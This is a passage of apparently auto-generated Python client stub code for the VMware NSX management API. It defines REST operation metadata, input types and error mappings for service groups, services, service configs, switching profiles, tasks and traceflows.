'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/ns-service-groups',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'default_service': 'default_service',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'ns_service_group_id': type.StringType(),
'ns_service_group': type.ReferenceType('com.vmware.nsx.model_client', 'NSServiceGroup'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.concurrent_change':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ConcurrentChange'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/ns-service-groups/{ns-service-group-id}',
request_body_parameter='ns_service_group',
path_variables={
'ns_service_group_id': 'ns-service-group-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NSServiceGroup'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NSServiceGroup'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NSServiceGroupListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NSServiceGroup'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.ns_service_groups',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _NsServicesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'ns_service': type.ReferenceType('com.vmware.nsx.model_client', 'NSService'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/ns-services',
request_body_parameter='ns_service',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'ns_service_id': type.StringType(),
'force': type.OptionalType(type.BooleanType()),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.concurrent_change':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ConcurrentChange'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/ns-services/{ns-service-id}',
path_variables={
'ns_service_id': 'ns-service-id',
},
query_parameters={
'force': 'force',
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'ns_service_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/ns-services/{ns-service-id}',
path_variables={
'ns_service_id': 'ns-service-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'default_service': type.OptionalType(type.BooleanType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/ns-services',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'default_service': 'default_service',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'ns_service_id': type.StringType(),
'ns_service': type.ReferenceType('com.vmware.nsx.model_client', 'NSService'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.concurrent_change':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ConcurrentChange'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/ns-services/{ns-service-id}',
request_body_parameter='ns_service',
path_variables={
'ns_service_id': 'ns-service-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NSService'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NSService'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NSServiceListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NSService'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.ns_services',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _ServiceConfigsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'service_config': type.ReferenceType('com.vmware.nsx.model_client', 'ServiceConfig'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/service-configs',
request_body_parameter='service_config',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'config_set_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/service-configs/{config-set-id}',
path_variables={
'config_set_id': 'config-set-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'config_set_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/service-configs/{config-set-id}',
path_variables={
'config_set_id': 'config-set-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'profile_type': type.OptionalType(type.StringType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/service-configs',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'profile_type': 'profile_type',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'config_set_id': type.StringType(),
'service_config': type.ReferenceType('com.vmware.nsx.model_client', 'ServiceConfig'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/service-configs/{config-set-id}',
request_body_parameter='service_config',
path_variables={
'config_set_id': 'config-set-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ServiceConfig'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ServiceConfig'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ServiceConfigListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ServiceConfig'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.service_configs',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _SwitchingProfilesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'base_switching_profile': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseSwitchingProfile')]),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/switching-profiles',
request_body_parameter='base_switching_profile',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'switching_profile_id': type.StringType(),
'unbind': type.OptionalType(type.BooleanType()),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/switching-profiles/{switching-profile-id}',
path_variables={
'switching_profile_id': 'switching-profile-id',
},
query_parameters={
'unbind': 'unbind',
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'switching_profile_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/switching-profiles/{switching-profile-id}',
path_variables={
'switching_profile_id': 'switching-profile-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'include_system_owned': type.OptionalType(type.BooleanType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
'switching_profile_type': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/switching-profiles',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'include_system_owned': 'include_system_owned',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
'switching_profile_type': 'switching_profile_type',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'switching_profile_id': type.StringType(),
'base_switching_profile': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseSwitchingProfile')]),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/switching-profiles/{switching-profile-id}',
request_body_parameter='base_switching_profile',
path_variables={
'switching_profile_id': 'switching-profile-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseSwitchingProfile')]),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseSwitchingProfile')]),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'SwitchingProfilesListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseSwitchingProfile')]),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.switching_profiles',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _TasksStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'task_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/tasks/{task-id}',
path_variables={
'task_id': 'task-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'request_uri': type.OptionalType(type.StringType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
'status': type.OptionalType(type.StringType()),
'user': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/tasks',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'request_uri': 'request_uri',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
'status': 'status',
'user': 'user',
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TaskProperties'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TaskListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
'list': list_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.tasks',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _TraceflowsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'traceflow_request': type.ReferenceType('com.vmware.nsx.model_client', 'TraceflowRequest'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/traceflows',
request_body_parameter='traceflow_request',
